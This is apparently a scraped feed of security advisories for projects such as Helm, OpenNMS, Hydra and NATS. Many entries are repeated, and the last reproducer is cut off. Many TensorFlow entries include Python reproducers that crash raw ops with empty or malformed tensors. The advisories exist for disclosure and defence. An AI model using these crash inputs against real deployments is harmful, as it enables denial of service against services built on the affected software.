Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …

Listing of upload directory contents possible

There's a security issue in prosody-filer versions < 1.0.1 which leads to unwanted directory listings of download directories. An attacker is able to list previous uploads of a certain user by shortening the URL and accessing a URL subdirectory other than /upload/ (or the corresponding user-defined root dir). Version 1.0.1 and later fix this problem and allow only direct file access if the full path is known. Directory listings …

Incorrect Authorization

Istio has a remotely exploitable vulnerability where an HTTP request path with multiple slashes or escaped slash characters (%2F or %5C) could potentially bypass an Istio authorization policy when path based authorization rules are used.

Improper Privilege Management

Spring Framework WebFlux applications are vulnerable to a privilege escalation. By (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.

Exposure of Sensitive Information to an Unauthorized Actor

There is an information disclosure vulnerability in Helm from version 3.1.0 and before version 3.2.0. lookup is a Helm template function introduced in Helm v3. It is able to look up resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates. The documented behavior of helm template states that it does not …

Authentication Bypass by Capture-replay

In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using the client authentication method 'private_key_jwt' [1], the OpenID specification says the following about the assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …

Authentication Bypass by Capture-replay

In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using the client authentication method 'private_key_jwt' [1], the OpenID specification says the following about the assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …

URL Redirection to Untrusted Site ('Open Redirect')

OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if an allowlist domain was configured for …

URL Redirection to Untrusted Site ('Open Redirect')

OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if an allowlist domain was configured for …

Uncontrolled Resource Consumption

ws is an open source WebSocket client and server library for Node. In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers.

Incorrect Authorization

Pion WebRTC before 3.0.15 didn't properly tear down the DTLS connection when certificate verification failed. The PeerConnectionState was set to failed, but a user could ignore that and continue to use the PeerConnection. (A WebRTC implementation shouldn't allow the user to continue if verification has failed.)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting since there is no validation on the input being sent to the name parameter in noticeWizard endpoint. Due to this flaw an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function validateFormInput() performs improper validation checks on the input sent to the groupName and groupComment parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms.

Improper Input Validation

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …

Improper Input Validation

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …

Cross-Site Request Forgery (CSRF)

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.

Cross-Site Request Forgery (CSRF)

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection at /opennms/admin/userGroupView/users/updateUser. This flaw allows assigning ROLE_ADMIN security role to a normal user. Using this flaw, an attacker can trick the admin user to assign administrator privileges to a normal user by enticing him to click upon an attacker-controlled website.

Cross-Site Request Forgery (CSRF)

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Uncontrolled Search Path Element

cloudflared versions prior to 2020.8.1 contain a local privilege escalation vulnerability on Windows systems. When run on a Windows system, cloudflared searches for configuration files which could be abused by a malicious entity to execute commands as a privileged user. Version 2020.8.1 fixes this issue.

Signature Validation Bypass

Impact: Given a valid SAML Response, an attacker can potentially modify the document, bypassing signature validation in order to pass off the altered document as a signed one. This enables a variety of attacks, including users accessing accounts other than the one to which they authenticated in the identity provider, or full authentication bypass if an external attacker can obtain an expired, signed SAML Response. Patches: A patch is available, …

Reachable Assertion

A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed by OpenLDAP’s slapd server, to trigger an assertion failure. The highest threat from this vulnerability is to system availability.

NULL Pointer Dereference

In teler before version 0.0.1, if you run teler inside a Docker container and it encounters the errors.Exit function, a denial of service (SIGSEGV) occurs because teler does not properly obtain its process ID and process group ID in order to kill them. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.

NULL Pointer Dereference

In teler before version 0.0.1, if you run teler inside a Docker container and it encounters the errors.Exit function, a denial of service (SIGSEGV) occurs because teler does not properly obtain its process ID and process group ID in order to kill them. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.

Information Exposure

Keystone 5 is an open source CMS platform to build Node.js applications. This security advisory relates to a newly discovered capability in our query infrastructure to directly or indirectly expose the values of private fields, bypassing the configured access control.

Incorrect Resource Transfer Between Spheres

containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in …

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within unsquashfs, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for an unprivileged run of Singularity (either an unprivileged installation or one with allow setuid = no) when a user attempts to …

Improper Handling of Exceptional Conditions

In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this to their advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0.

Improper Handling of Exceptional Conditions

In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this to their advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0.

Cross-site Scripting

A reflected cross-site scripting (XSS) vulnerability in Shopizer allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.

Command Injection

The @ronomon/opened library is vulnerable to a command injection vulnerability which would allow a remote attacker to execute commands on the system if the library was used with untrusted input.

accounts: Hash account number using Salt

@alovak found that, currently, when we build the hash of an account number we do not "salt" it, which makes it vulnerable to a rainbow table attack. What did you expect to see? I expected a salt (some random number from configuration) to be used in hash.AccountNumber. I would generate the salt per tenant at least (maybe per organization).
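
The suggested fix is keyed (salted) hashing with a per-tenant secret, sketched below in Python even though the project itself is not written in Python; the salt value is a placeholder.

    import hashlib
    import hmac

    def hash_account_number(account_number: str, tenant_salt: bytes) -> str:
        # HMAC keyed with a per-tenant salt: the same account number hashes to
        # different values for different tenants, defeating precomputed tables.
        return hmac.new(tenant_salt, account_number.encode(), hashlib.sha256).hexdigest()

    unsalted = hashlib.sha256(b"000123456789").hexdigest()  # rainbow-table friendly
    salted = hash_account_number("000123456789", b"tenant-42-random-salt")
    print(unsalted)
    print(salted)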

Use After Free

A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors:

    import tensorflow as tf

    orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
    orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
    grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
    ksize = [1, 1, 1, 1, 1]
    strides = [1, 1, 1, 1, 1]
    padding = "SAME"

    tf.raw_ops.MaxPool3DGradGrad(
        orig_input=orig_input, orig_output=orig_output, grad=grad,
        ksize=ksize, strides=strides, padding=padding)

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors:

    import tensorflow as tf

    orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
    orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
    grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
    ksize = [1, 1, 1, 1, 1]
    strides = [1, 1, 1, 1, 1]
    padding = "SAME"

    tf.raw_ops.MaxPool3DGradGrad(
        orig_input=orig_input, orig_output=orig_output, grad=grad,
        ksize=ksize, strides=strides, padding=padding)

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors:

    import tensorflow as tf

    orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
    orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
    grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
    ksize = [1, 1, 1, 1, 1]
    strides = [1, 1, 1, 1, 1]
    padding = "SAME"

    tf.raw_ops.MaxPool3DGradGrad(
        orig_input=orig_input, orig_output=orig_output, grad=grad,
        ksize=ksize, strides=strides, padding=padding)

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers undefined behavior if one of the input tensors is empty:

    import tensorflow as tf

    orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64)
    orig_output = tf.constant([], dtype=tf.int64)
    out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64)
    row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64)
    col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64)

    tf.raw_ops.FractionalMaxPoolGrad(
        orig_input=orig_input, orig_output=orig_output,
        out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence,
        col_pooling_sequence=col_pooling_sequence, overlapping=False)

The code is also vulnerable to a denial of service attack as a …

Type confusion during tensor casts leads to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors results in null pointer dereferences. There are multiple ways to reproduce this; a few examples are listed here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Stack overflow due to looping TFLite subgraph

TFLite graphs must not have loops between nodes. However, this condition was not checked, and an attacker could craft models that would result in an infinite loop during evaluation. In certain cases, the infinite loop would be replaced by a stack overflow due to too many recursive calls.

Session operations in eager mode lead to null pointer dereferences

In eager mode (the default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference; see the reproducer below.
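
The two calls from the advisory, as a runnable script:

```python
import tensorflow as tf

# Session-related raw ops are meaningless in eager mode, but can still be invoked.
tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'], dtype=4)
tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
```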

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation, as the code assumes that the tensor contents are pure scalars; see the reproducer below.
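
The advisory's reproducer as a script; the path passed as memory_region_name is the one used in the advisory:

```python
import tensorflow as tf

# Crashes with "Segmentation fault" on an affected build.
tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[],
                          memory_region_name="/tmp/test.txt")
```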

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out of the standard library, as std::vector invariants are broken; see the reproducer below.
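
The reproducer from the advisory, runnable against an affected TensorFlow build:

```python
import tensorflow as tf

indices = tf.constant([], shape=[0, 0], dtype=tf.int64)
values = tf.constant([], shape=[0, 0], dtype=tf.int64)
# Negative dimensions in the dense shape are what break the std::vector invariants.
dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64)
weights = tf.constant([], shape=[0, 0], dtype=tf.int64)

tf.raw_ops.SparseCountSparseOutput(
    indices=indices, values=values, dense_shape=dense_shape,
    weights=weights, minlength=79, maxlength=96, binary_output=False)
```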

Segfault in `CTCBeamSearchDecoder`

Due to a lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger a denial of service via segmentation faults; see the reproducer below.
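
The advisory's reproducer, laid out as a script:

```python
import tensorflow as tf

inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32)
# Negative sequence lengths are among the crafted inputs.
sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100],
                              shape=[8], dtype=tf.int32)

tf.raw_ops.CTCBeamSearchDecoder(
    inputs=inputs,
    sequence_length=sequence_length,
    beam_width=10,
    top_paths=3,
    merge_repeated=True)
```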

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null, as in the reproducer below. Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.
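
The reproducer from the advisory, as a runnable script:

```python
import tensorflow as tf

# Empty tensors for the diagonal and padding value have no backing buffer.
d = tf.convert_to_tensor([], dtype=tf.float32)
p = tf.convert_to_tensor([], dtype=tf.float32)

tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p)
```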

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding a reference to a null pointer in tf.raw_ops.ParameterizedTruncatedNormal; see the reproducer below.
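
The reproducer, runnable against an affected TensorFlow version:

```python
import tensorflow as tf

# The shape tensor is empty; the remaining parameters are scalars.
shape = tf.constant([], shape=[0], dtype=tf.int32)
means = tf.constant((1), dtype=tf.float32)
stdevs = tf.constant((1), dtype=tf.float32)
minvals = tf.constant((1), dtype=tf.float32)
maxvals = tf.constant((1), dtype=tf.float32)

tf.raw_ops.ParameterizedTruncatedNormal(
    shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)
```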

RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

A security-sensitive bug was discovered by Open Source Developer Erik Sundell of Sundell Open Source Consulting AB. The functions RandomAlphaNumeric(int) and CryptoRandomAlphaNumeric(int) are not as random as they should be. Small values of int in the functions above will return a smaller subset of results than they should. For example, RandomAlphaNumeric(1) will always return a digit in the 0-9 range, while RandomAlphaNumeric(4) will return around ~7 million of the ~13M …

Path Traversal

Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service; see the reproducer below.
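
The advisory's reproducer as a script:

```python
import tensorflow as tf

input = tf.zeros([1, 1, 1], dtype=tf.int32)
seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32)

# A negative seq_dim is part of the crafted input.
tf.raw_ops.ReverseSequence(
    input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)
```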

Out-of-bounds Write

A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Out-of-bounds Read

An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.

Out-of-bounds Read

An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams; see the reproducer below.
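
The reproducer from the advisory, as a runnable script:

```python
import tensorflow as tf

data = tf.constant([''] * 11, shape=[11], dtype=tf.string)

# 116 split points for a data tensor with only 11 elements.
splits = [0] * 115
splits.append(3)
data_splits = tf.constant(splits, shape=[116], dtype=tf.int64)

tf.raw_ops.StringNGrams(
    data=data, data_splits=data_splits, separator=b'Ss',
    ngram_widths=[7, 6, 11], left_pad='ABCDE', right_pad=b'ZYXWVU',
    pad_width=50, preserve_short_sequences=True)
```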

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows; see the reproducer below.
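
The reproducer, runnable against an affected TensorFlow build:

```python
import tensorflow as tf

# All inputs are empty tensors, including the dense shape.
indices = tf.constant([], shape=[0, 0], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
dense_shape = tf.constant([], shape=[0], dtype=tf.int64)

tf.raw_ops.SparseFillEmptyRows(
    indices=indices, values=values, dense_shape=dense_shape, default_value=0)
```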

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance; see the reproducer below.
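
The advisory's reproducer as a script:

```python
import tensorflow as tf

# Indices lie outside the all-zero hypothesis/truth shapes.
hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64)
hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32)
hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)
truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64)
truth_values = tf.constant([], shape=[0], dtype=tf.float32)
truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)

tf.raw_ops.EditDistance(
    hypothesis_indices=hypothesis_indices,
    hypothesis_values=hypothesis_values,
    hypothesis_shape=hypothesis_shape,
    truth_indices=truth_indices,
    truth_values=truth_values,
    truth_shape=truth_shape,
    normalize=True)
```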

Nil dereference in NATS JWT, DoS of nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …

Nil dereference in NATS JWT causing DoS of nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.DrawBoundingBoxesV2 can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs; see the reproducer below.
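
The reproducer from the advisory, as a runnable script:

```python
import tensorflow as tf

# The boxes and colors tensors have zero-sized dimensions that do not
# match the images tensor.
images = tf.fill([10, 96, 0, 1], 0.)
boxes = tf.fill([10, 53, 0], 0.)
colors = tf.fill([0, 1], 0.)

tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
```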

Lack of validation in `SparseDenseCwiseMul`

Due to a lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses outside the bounds of heap allocated data; see the reproducer below.
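
The advisory's reproducer as a script:

```python
import tensorflow as tf

# The sparse inputs claim 10 index rows but carry no values.
indices = tf.constant([], shape=[10, 0], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
shape = tf.constant([0, 0], shape=[2], dtype=tf.int64)
dense = tf.constant([], shape=[0], dtype=tf.int64)

tf.raw_ops.SparseDenseCwiseMul(
    sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
```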

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky; see the reproducer below.
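
The reproducer from the advisory, as a runnable script:

```python
import numpy as np
import tensorflow as tf
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops

indices_array = np.array([[0, 0]])
value_array = np.array([-10.0], dtype=np.float32)
dense_shape = [1, 1]
st = tf.SparseTensor(indices_array, value_array, dense_shape)

input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
    st.indices, st.values, st.dense_shape)

# An empty (1 x 0) permutation is not a valid permutation of a 1 x 1 matrix.
permutation = tf.constant([], shape=[1, 0], dtype=tf.int32)

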